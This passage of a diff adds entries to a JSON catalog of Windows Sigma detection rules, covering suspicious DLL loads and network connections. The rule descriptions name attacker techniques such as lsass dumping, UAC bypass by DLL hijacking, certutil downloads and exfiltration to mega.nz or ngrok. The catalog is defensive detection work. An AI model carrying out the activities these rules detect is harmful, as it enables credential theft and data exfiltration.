"Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load", + "meta": { + "refs": [ + "https://www.py2exe.org/", + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ], + "creation_date": "2020/05/03", + "filename": "image_load_susp_python_image_load.yml", + "author": "Patrick St. 
John, OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications", + "meta": { + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://thewover.github.io/Introducing-Donut/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2020/10/14", + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "author": "omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. 
This could be an indicator of potential Screen Capture.", + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2020/05/02", + "filename": "image_load_susp_system_drawing_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2018/01/07", + "filename": "image_load_susp_uncommon_image_load.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS Dll by Uncommon Executable", + "meta": { + "refs": [ + "https://github.com/ORCx41/DeleteShadowCopies", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/10/31", + "filename": "image_load_susp_vss_dll_load.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/07/07", + "filename": "image_load_susp_vss_ps_load.yml", + "author": "Markus Neis, @markus_neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via Microsoft Word", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_winword_vbadll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as 
appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack", + "meta": { + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "creation_date": "2019/10/28", + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "author": "SBousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load", + "meta": { + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Time Travel Debugging 
Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "image_load_tttracer_mod_load.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad", + "meta": { + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/17", + "filename": "image_load_uac_bypass_iscsicpl.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + 
"uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL", + "meta": { + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ], + "creation_date": "2020/10/06", + "filename": "image_load_uac_bypass_via_dism.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs", + "meta": { + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], + "creation_date": "2020/10/20", + "filename": "image_load_uipromptforcreds_dlls.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." 
+ ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/22", + "filename": "image_load_unsigned_image_loaded_into_lsass.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/09/07", + "filename": "image_load_usp_svchost_clfsw32.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rarely observed" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from 
Nondefault Path", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries", + "meta": { + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ], + "creation_date": "2020/10/17", + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. 
It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2019/08/10", + "filename": "image_load_wmi_module_load.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI command line event consumers", + "uuid": 
"05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "value": "WMI Persistence - Command Line Event Consumer", + "meta": { + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ], + "creation_date": "2018/03/07", + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads", + "meta": { + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2020/06/24", + "filename": "image_load_wsman_provider_image_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the Windows folder accessing github.com", + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication", + "meta": 
{ + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2017/08/24", + "filename": "net_connection_win_binary_github_com.yml", + "author": "Michael Haag (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown", + "@subTee in your network" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint", + "meta": { + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2018/08/30", + "filename": "net_connection_win_binary_susp_com.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/09/02", + "filename": "net_connection_win_certutil.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "value": "Windows Crypto Mining Pool Connections", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ], + "creation_date": "2021/10/26", + "filename": "net_connection_win_crypto_mining.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers", + "meta": { + "refs": [ + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + 
"https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ], + "creation_date": "2022/08/17", + "filename": "net_connection_win_dead_drop_resolvers.yml", + "author": "Sorina Ionescu", + "level": "high", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution", + "attack.t1559.001" + ], + "creation_date": "2020/07/13", + "filename": "net_connection_win_dllhost_net_connections.yml", + "author": "bartblaze", + "level": "medium", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections from Equation Editor", + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection", + "meta": { + "refs": [ + "https://twitter.com/forensicitguy/status/1513538712986079238", + 
"https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "creation_date": "2022/04/14", + "filename": "net_connection_win_eqnedt.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections", + "meta": { + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "creation_date": "2021/11/10", + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "level": "medium", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." 
+ ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections", + "meta": { + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], + "creation_date": "2022/10/05", + "filename": "net_connection_win_hh.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/01/22", + "filename": "net_connection_win_imewdbld.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on 
statistical analysis from two different sandbox system databases", + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports", + "meta": { + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ], + "creation_date": "2017/03/19", + "filename": "net_connection_win_malware_backconnect_ports.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz", + "meta": { + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2021/12/06", + "filename": "net_connection_win_mega_nz.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "net_connection_win_msiexec.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io", + "meta": { + "refs": [ + "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2022/07/16", + "filename": "net_connection_win_ngrok_io.yml", + "author": "Florian Roth", + 